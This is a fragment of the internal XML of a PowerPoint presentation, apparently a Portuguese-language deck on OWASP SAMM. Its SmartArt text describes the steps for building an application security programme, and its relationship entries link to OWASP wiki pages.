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9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag20.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96" r:id="rId2"/>
    <p:sldId id="316" r:id="rId3"/>
    <p:sldId id="297" r:id="rId4"/>
    <p:sldId id="298" r:id="rId5"/>
    <p:sldId id="299" r:id="rId6"/>
    <p:sldId id="300" r:id="rId7"/>
    <p:sldId id="301" r:id="rId8"/>
    <p:sldId id="302" r:id="rId9"/>
    <p:sldId id="303" r:id="rId10"/>
    <p:sldId id="304" r:id="rId11"/>
    <p:sldId id="305" r:id="rId12"/>
    <p:sldId id="306" r:id="rId13"/>
    <p:sldId id="318" r:id="rId14"/>
    <p:sldId id="307" r:id="rId15"/>
    <p:sldId id="308" r:id="rId16"/>
    <p:sldId id="317" r:id="rId17"/>
    <p:sldId id="309" r:id="rId18"/>
    <p:sldId id="310" r:id="rId19"/>
    <p:sldId id="311" r:id="rId20"/>
    <p:sldId id="312" r:id="rId21"/>
    <p:sldId id="313" r:id="rId22"/>
    <p:sldId id="314" r:id="rId23"/>
    <p:sldId id="315" r:id="rId24"/>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D6AC"/>
    <a:srgbClr val="D9EAD5"/>
    <a:srgbClr val="D0D9CF"/>
    <a:srgbClr val="4E8542"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="3333FF"/>
    <a:srgbClr val="F9FBFD"/>
    <a:srgbClr val="4F81BD"/>
    <a:srgbClr val="4F59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789" autoAdjust="0"/>
    <p:restoredTop sz="95335" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="210" d="100"/>
          <a:sy n="210" d="100"/>
        </p:scale>
        <p:origin x="-1068" y="502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hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="Externa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2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList5" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple3" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent4_2" csCatId="accent4" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="pt-BR" sz="1050" b="1" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Iniciando</a:t>
          </a:r>
          <a:endParaRPr lang="pt-BR" sz="1050" b="1" noProof="0" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Estabelecer um </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>programa</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t> de segurança de aplicações</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> e estimular sua adoção.</a:t>
          </a:r>
          <a:endParaRPr lang="pt-BR" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" type="parTrans" cxnId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}" type="sibTrans" cxnId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1050" b="1" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Abordagem de Portfolio Baseada em Risco</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" type="parTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D22B1E2D-9241-472F-8A9E-565E70887137}" type="sibTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Identificar e </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>estabelecer prioridades no portfolio de aplicações </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>usando uma perspectiva de risco. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" type="parTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EBA831D-0061-461C-A1EF-795466184E12}" type="sibTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Estabelecer um </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>modelo comum de classificação de riscos </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>aliado a um conjunto consistente de fatores de impacto e probabilidade que reflitam a tolerância de risco da organização.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53CD5622-4FF7-42BA-82CF-9FA917848989}" type="parTrans" cxnId="{6010088D-1046-466A-BB02-8A55CE262380}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6249606A-E44B-456D-8550-331FDC0465D3}" type="sibTrans" cxnId="{6010088D-1046-466A-BB02-8A55CE262380}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1050" b="1" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Ativar com uma fundação sólida</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E44837D-D7DC-4906-821E-A6950790F46F}" type="parTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" type="sibTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Estabelecer um conjunto de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>politicas e normas </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>que sejam uma base para segurança de aplicações a ser seguida por todas as equipes de desenvolvimento.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" type="parTrans" cxnId="{68D71606-5C52-434C-93A7-B1ED203D82B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}" type="sibTrans" cxnId="{68D71606-5C52-434C-93A7-B1ED203D82B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Definir um </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>conjunto comum de controles de segurança reutilizáveis </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>que complementem as políticas e normas, contendo orientações de uso para as fases de projeto e desenvolvimento.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" type="parTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}" type="sibTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{024BBBE2-0706-4354-8AB0-3262009E8862}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Estabelecer um </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>currículo de formação em segurança de aplicações</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t> obrigatório e direcionado às diversas funções de desenvolvimento e tópicos existentes. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8AF02AF4-6088-4389-900C-B1A6C7B52EA4}" type="parTrans" cxnId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C468EA37-5762-4D06-A4F9-E930ECF24341}" type="sibTrans" cxnId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1050" b="1" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Integrar Segurança  aos Processos Existentes</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BC25BDC-3278-4082-B675-15E8A5144241}" type="parTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" type="sibTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Definir e integrar </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>implementações de segurança</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> e atividades de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>verificação</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> nos processos de desenvolvimento e operação </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
            <a:t>existentes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>. As atividades incluem </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>Modelagem de Ameaças</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, Projeto Seguro e </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>Revisão</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, Codificação e </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>Revisão de Código</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> com Segurança, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>Testes de Invasão</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, e Correção.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" type="parTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}" type="sibTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Oferecer especialistas e </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>serviços de suporte para as equipes de desenvolvimento e projeto</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
            <a:t> para obter êxito nos processos.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" type="parTrans" cxnId="{037BDB8F-830F-44B2-9861-7E6A03948B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}" type="sibTrans" cxnId="{037BDB8F-830F-44B2-9861-7E6A03948B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C40210B5-480D-4766-978A-36F3F23CB9B8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="pt-BR" sz="1050" b="1" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Oferecer Visibilidade para a Gerência</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" type="parTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A003834B-8490-4CC6-B531-19539D19FBD4}" type="sibTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
